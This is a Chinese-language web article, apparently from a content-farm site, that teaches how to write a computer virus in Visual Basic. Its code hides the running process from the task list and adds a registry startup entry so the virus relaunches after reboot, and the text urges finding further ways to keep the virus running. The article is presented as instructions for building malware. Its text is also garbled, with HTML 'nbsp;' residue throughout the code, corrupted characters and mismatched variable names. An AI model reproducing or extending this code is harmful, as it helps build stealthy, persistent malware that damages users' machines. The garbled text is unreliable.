如何制作電腦病毒方法
對(duì)于接觸計(jì)算機(jī)的朋友們來(lái)說(shuō),病毒已經(jīng)不在是一個(gè)陌生的東西。病毒一般都具有傳播、隱藏、破壞等能力。下面由學(xué)習(xí)啦小編給你做出詳細(xì)的電腦病毒制作方法介紹!希望對(duì)你有幫助!
電腦病毒制作方法介紹:
所以自從第一個(gè)病毒問(wèn)世以來(lái),它便被人們視為一種神秘的東西。但是,我們要知道。病毒也是程序,也是由人寫(xiě)出來(lái)的。
所以,病毒并不是什么高不可攀的東西?,F(xiàn)在,讓我們了解一下VB制作病毒的原理。首先,病毒是有隱藏性的。如何來(lái)實(shí)現(xiàn)病毒的隱藏是很多年來(lái)的熱點(diǎn)話題。我們先不接觸什么線程插入技術(shù)。
我們要實(shí)行自我隱藏,就要用到API函數(shù)。其代碼如下:Publicnbsp;Declarenbsp;Functionnbsp;GetCurrentProcessidnbsp;Libnbsp;“kernel32“nbsp;()nbsp;Asnbsp;LongPublicnbsp;Declarenbsp;Functionnbsp;RegisterServiceProcessnbsp;Libnbsp;“kernel32“nbsp;(ByValnbsp;dwProcessIDnbsp;Asnbsp;Long,nbsp;ByValnbsp;dwTypenbsp;Asnbsp;Long)Publicnbsp;Constnbsp;RSP_SIMPLE_SERVICEnbsp;=nbsp;1Publicnbsp;Constnbsp;RSP_UNREGISTER_SERVICEnbsp;=nbsp;0Publicnbsp;Subnbsp;MakeMeService()Dimnbsp;pidnbsp;Asnbsp;LongDimnbsp;reserynbsp;Asnbsp;Longpidnbsp;=nbsp;GetCurrentProcessid()regservnbsp;=nbsp;RegisterServiceProcess(pid,nbsp;RSP_SIMPLE_SERVICE)Endnbsp;Sub這樣就實(shí)現(xiàn)了自我隱藏。還有別的什么App.Titlenbsp;=nbsp;““和App.TaskVisiblenbsp;=nbsp;False都可以用于VB病毒的隱藏。
病毒光會(huì)隱藏還不行,還要有常駐內(nèi)存的能力。
說(shuō)通俗點(diǎn),計(jì)算機(jī)關(guān)閉病毒也就跟著死去,而計(jì)算機(jī)重啟,病毒也要跟這復(fù)活。
所以,我們接下來(lái)的任務(wù)就是:實(shí)現(xiàn)病毒的開(kāi)機(jī)自啟。了解病毒的朋友會(huì)知道,病毒一般是利用在注冊(cè)表中插入相應(yīng)鍵值來(lái)實(shí)現(xiàn)開(kāi)機(jī)自啟的。
所以,我們就要利用編程來(lái)實(shí)現(xiàn)著一功能。讀寫(xiě)注冊(cè)表要用到API函數(shù),代碼:Privatenbsp;Declarenbsp;Functionnbsp;RegCreateKeynbsp;Libnbsp;“advapi32.dll“nbsp;Aliasnbsp;“RegCreateKeyA“nbsp;(ByValnbsp;hKeynbsp;Asnbsp;Long,nbsp;ByValnbsp;lpSubKeynbsp;Asnbsp;String,nbsp;phkResultnbsp;Asnbsp;Long)nbsp;Asnbsp;LongPrivatenbsp;Declarenbsp;Functionnbsp;RegCloseKeynbsp;Libnbsp;“advapi32.dll“nbsp;(ByValnbsp;hKeynbsp;Asnbsp;Long)nbsp;Asnbsp;LongPrivatenbsp;Declarenbsp;Functionnbsp;RegSetValueExnbsp;Libnbsp;“advapi32.dll“nbsp;Aliasnbsp;“RegSetValueExA“nbsp;(ByValnbsp;hKeynbsp;Asnbsp;Long,nbsp;ByValnbsp;lpvalueNamenbsp;Asnbsp;String,nbsp;ByValnbsp;Reservednbsp;Asnbsp;Long,nbsp;ByValnbsp;dwTypenbsp;Asnbsp;Long,nbsp;lpDatanbsp;Asnbsp;Any,nbsp;ByValnbsp;cbDatanbsp;Asnbsp;Long)nbsp;Asnbsp;Long上述是API聲明。
病毒的開(kāi)機(jī)自啟就是在RUN下建立一個(gè)啟動(dòng)項(xiàng),代碼:Dimnbsp;hKeynbsp;Asnbsp;LongDimnbsp;ccLetnbsp;ccnbsp;=nbsp;Len(“病毒的絕對(duì)路徑“)RegCreateKeynbsp;HKEY_LOCAL_MACHINE,nbsp;“SoftwareMicrosoftWindowsCurrentVersionRunservices“,nbsp;hKeyRegSetValueExnbsp;hKey,nbsp;“鍵名“,nbsp;0,nbsp;REG_SZ,nbsp;ByValnbsp;“病毒的絕對(duì)路徑“,nbsp;ccRegCloseKeynbsp;hKey以上代碼執(zhí)行后會(huì)在注冊(cè)表中加入一個(gè)病毒的啟動(dòng)項(xiàng)。光利用開(kāi)機(jī)自啟來(lái)長(zhǎng)駐內(nèi)存也太容易被殺了。所以,我們還要想盡一切辦法來(lái)讓病毒啟動(dòng)。
看了“如何制作電腦病毒”文章的還看了:
1.電腦病毒如何制作
2.如何制作電腦病毒
4.電腦病毒制作方法